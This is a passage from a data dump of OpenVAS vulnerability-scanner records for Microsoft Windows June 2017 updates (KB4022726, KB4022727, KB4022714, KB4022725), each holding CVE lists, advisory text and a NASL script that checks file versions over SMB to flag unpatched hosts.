\"CVE-2017-8464\",\n \"CVE-2017-8469\", \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8519\",\n \"CVE-2017-8522\", \"CVE-2017-8524\", \"CVE-2017-8465\", \"CVE-2017-8466\",\n \"CVE-2017-8468\", \"CVE-2017-8517\", \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98852, 98902, 98853, 98933, 98949, 98885, 98903, 98854,\n 98953, 98819, 98920, 98918, 98845, 98856, 98820, 98821, 98914,\n 98922, 98857, 98862, 98824, 98923, 98929, 98858, 98859, 98826,\n 98932, 98835, 98836, 98847, 98860, 98940, 98837, 98839, 98864,\n 98865, 98867, 98840, 98884, 98869, 98870, 98901, 98887, 98850,\n 98900, 98818, 98842, 98848, 98849, 98899, 98926, 98930, 98843,\n 98844, 98846, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 12:42:55 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 12:08:00 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022726)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022726\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in importing printer drivers and get errors with error code\n 0x80070bcb.\n\n - The mouse input can cease to function. The mouse pointer may continue\n to move, but movements and clicks produce no response other than a\n beeping noise.\n\n - An error in printing a document using a 32-bit application can crash a\n Print Server in a call to nt!MiGetVadWakeList.\n\n - An error in unsupported hardware notification is shown and Windows\n Updates not scanning, for systems using the AMD Carrizo DDR4 processor or\n Windows Server 2012 R2 systems using Xeon E3V6 processor.\n\n - Multiple issue in Microsoft Windows PDF, Windows shell, Windows Kernel,\n Microsoft Graphics Component, Microsoft Uniscribe, Microsoft Scripting Engine,\n Windows COM, and Windows Kernel-Mode Drivers. For more information about the\n security vulnerabilities resolved, please refer to the Security Update Guide.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to gain\n the same user rights as the current user and to take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022726\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Searchindexer.exe\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"7.0.9600.18722\"))\n{\n report = 'File checked: ' + sysPath + \"\\Searchindexer.exe\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 7.0.9600.18722\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:21:01", "description": "This host is missing a critical security\n update according to Microsoft KB4022727", "cvss3": {}, "published": "2017-06-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022727)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811196", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811196", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022727)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811196\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8527\",\n \"CVE-2017-0218\", \"CVE-2017-0219\", \"CVE-2017-0282\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8530\", \"CVE-2017-8531\",\n \"CVE-2017-0283\", \"CVE-2017-0284\", \"CVE-2017-8477\", \"CVE-2017-8478\",\n \"CVE-2017-8532\", \"CVE-2017-0285\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8533\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8481\", \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\",\n \"CVE-2017-8547\", \"CVE-2017-8548\", \"CVE-2017-8549\", \"CVE-2017-0289\",\n \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\",\n \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8489\", \"CVE-2017-0297\",\n \"CVE-2017-0298\", \"CVE-2017-8490\", \"CVE-2017-8491\", \"CVE-2017-0299\",\n \"CVE-2017-0300\", \"CVE-2017-8460\", \"CVE-2017-8492\", \"CVE-2017-8493\",\n \"CVE-2017-8494\", \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8470\",\n \"CVE-2017-8471\", \"CVE-2017-8522\", \"CVE-2017-8523\", \"CVE-2017-8524\",\n \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\", \"CVE-2017-8517\",\n \"CVE-2017-8554\", \"CVE-2017-8575\", \"CVE-2017-8518\");\n script_bugtraq_id(98878, 98852, 98902, 98933, 98897, 98898, 98885, 98853, 98903,\n 98953, 98863, 98819, 98920, 98918, 98854, 98845, 98820, 98914,\n 98856, 98857, 98821, 98824, 98922, 98923, 98862, 98858, 98859,\n 98826, 98932, 98954, 98955, 98929, 98835, 98836, 98847, 98860,\n 98837, 98839, 98865, 98840, 98867, 98869, 98884, 98901, 98887,\n 98870, 98850, 98855, 98900, 98818, 98848, 98849, 98926, 98928,\n 98930, 98843, 98844, 98846, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-15 16:09:05 +0530 (Thu, 15 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022727)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022727\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Users cannot print enhanced metafiles (EMF) or documents containing bitmaps\n rendered out of bounds using the BitMapSection (DIBSection) function.\n\n - Displays turn off unexpectedly even when 'Turn off display' is set to 'Never' in\n Power Options.\n\n - certutil.exe can no longer generate an export file (.epf) when attempting to\n recover a key for a version 1 certificate.\n\n - MSI files will no longer install when Device Guard is enabled.\n\n - A thin client becomes unusable and unresponsive when Unified Write Filter\n (UWF) with DISK mode is enabled causing NTFS errors with ID: 55 & ID: 130\n to be logged in the Event Logs.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user. If the current user is logged\n on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then\n install programs. View, change, or delete data, or create new accounts with full\n user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 for 32bit/x64-based Systems.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022727\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17442\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10240.0 - 11.0.10240.17442\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:26:43", "description": "This host is missing a critical security\n update according to Microsoft KB4022714", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022714)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811164", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811164", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022714)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811164\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8527\",\n \"CVE-2017-0216\", \"CVE-2017-0218\", \"CVE-2017-0219\", \"CVE-2017-0282\",\n \"CVE-2017-8475\", \"CVE-2017-8476\", \"CVE-2017-8477\", \"CVE-2017-8529\",\n \"CVE-2017-8530\", \"CVE-2017-8531\", \"CVE-2017-0283\", \"CVE-2017-0284\",\n \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\", \"CVE-2017-8533\",\n \"CVE-2017-0285\", \"CVE-2017-0287\", \"CVE-2017-8480\", \"CVE-2017-8481\",\n \"CVE-2017-8543\", \"CVE-2017-0288\", \"CVE-2017-0289\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\", \"CVE-2017-8548\",\n \"CVE-2017-8549\", \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8489\",\n \"CVE-2017-8490\", \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-0299\",\n \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\", \"CVE-2017-8460\",\n \"CVE-2017-8493\", \"CVE-2017-8494\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8522\", \"CVE-2017-8523\",\n \"CVE-2017-8524\", \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\",\n \"CVE-2017-8515\", \"CVE-2017-8517\", \"CVE-2017-8554\", \"CVE-2017-8575\",\n \"CVE-2017-8518\");\n script_bugtraq_id(98878, 98852, 98902, 98933, 98896, 98897, 98898, 98885, 98853,\n 98903, 98854, 98953, 98863, 98819, 98920, 98918, 98845, 98856,\n 98820, 98821, 98914, 98922, 98857, 98862, 98824, 98923, 98929,\n 98858, 98859, 98826, 98932, 98954, 98955, 98835, 98836, 98847,\n 98860, 98837, 98839, 98865, 98867, 98840, 98884, 98869, 98870,\n 98901, 98887, 98850, 98855, 98900, 98818, 98848, 98849, 98926,\n 98928, 98930, 98843, 98844, 98846, 98833, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 10:02:48 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022714)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022714\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists in,\n\n - The metafiles (EMF) or documents containing bitmaps rendered out of bounds\n using the BitMapSection(DIBSection) function.\n\n - The certutil.exe can no longer generate an export file (.epf) when attempting\n to recover a key for a version 1 certificate.\n\n - Additional issues with updated time zone information, updates to the\n Access Point Name (APN) database and Internet Explorer. Security updates to\n Microsoft Scripting Engine, Microsoft Edge, Windows COM, Windows kernel, Windows\n kernel-mode drivers, Microsoft Uniscribe, Microsoft Graphics Component, Windows\n Shell, Microsoft Windows PDF and Internet Explorer. For more information about\n the security vulnerabilities resolved, please refer to the Security Update Guide.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to\n execute arbitrary code in the context of the current user, gain the same user\n rights as the current user, to take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022714\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.961\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10586.0 - 11.0.10586.961\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:45:28", "description": "This host is missing a critical security\n update according to Microsoft KB4022725", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022725)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8499", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0295", "CVE-2017-8518", "CVE-2017-8555", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310811167", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811167", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022725)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811167\");\n script_version(\"2019-12-20T12:42:55+0000\");\n script_cve_id(\"CVE-2017-8474\", \"CVE-2017-8524\", \"CVE-2017-8527\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8530\", \"CVE-2017-0282\",\n \"CVE-2017-0283\", \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8531\",\n \"CVE-2017-8532\", \"CVE-2017-0285\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8533\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8481\", \"CVE-2017-8482\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-8548\", \"CVE-2017-8549\", \"CVE-2017-0289\", \"CVE-2017-0291\",\n \"CVE-2017-8483\", \"CVE-2017-8484\", \"CVE-2017-8555\", \"CVE-2017-0292\",\n \"CVE-2017-0294\", \"CVE-2017-0295\", \"CVE-2017-8485\", \"CVE-2017-8489\",\n \"CVE-2017-0296\", \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-8490\",\n \"CVE-2017-8491\", \"CVE-2017-0299\", \"CVE-2017-0300\", \"CVE-2017-8492\",\n \"CVE-2017-8493\", \"CVE-2017-8498\", \"CVE-2017-8499\", \"CVE-2017-8504\",\n \"CVE-2017-8460\", \"CVE-2017-8462\", \"CVE-2017-8470\", \"CVE-2017-8471\",\n \"CVE-2017-8520\", \"CVE-2017-8521\", \"CVE-2017-8522\", \"CVE-2017-8523\",\n \"CVE-2017-8464\", \"CVE-2017-8465\", \"CVE-2017-8515\", \"CVE-2017-8517\",\n \"CVE-2017-8554\", \"CVE-2017-8575\", \"CVE-2017-8518\");\n script_bugtraq_id(98902, 98930, 98933, 98853, 98903, 98953, 98863, 98885, 98920,\n 98854, 98845, 98819, 98820, 98914, 98856, 98857, 98821, 98824,\n 98922, 98923, 98862, 98858, 98826, 98932, 98954, 98955, 98929,\n 98835, 98859, 98847, 98956, 98836, 98837, 98904, 98860, 98865,\n 98839, 98840, 98867, 98869, 98884, 98901, 98870, 98850, 98886,\n 98883, 98892, 98887, 98900, 98848, 98849, 98925, 98926, 98928,\n 98818, 98843, 98833, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 12:42:55 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 13:30:05 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022725)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022725\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - The error with slow firewall operations that sometimes results in\n timeouts of Surface Hub's cleanup operation.\n\n - An issue with a race condition that prevents Cortana cross-device\n notification reply from working. Users will not be able to use the\n remote toast activation feature set.\n\n - An issue with the Privacy Separator feature of a Wireless Access Point\n does not block communication between wireless devices on local subnets.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code in the context of the current user,\n gain the same user rights as the current user and to take control of\n an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1703 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022725\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.412\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.15063.0 - 11.0.15063.412\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:48:08", "description": "This host is missing a critical security\n update according to Microsoft KB4022715", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022715)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-0173", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8496", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-0295", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8497", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-0215", "CVE-2017-8504", "CVE-2017-8484", 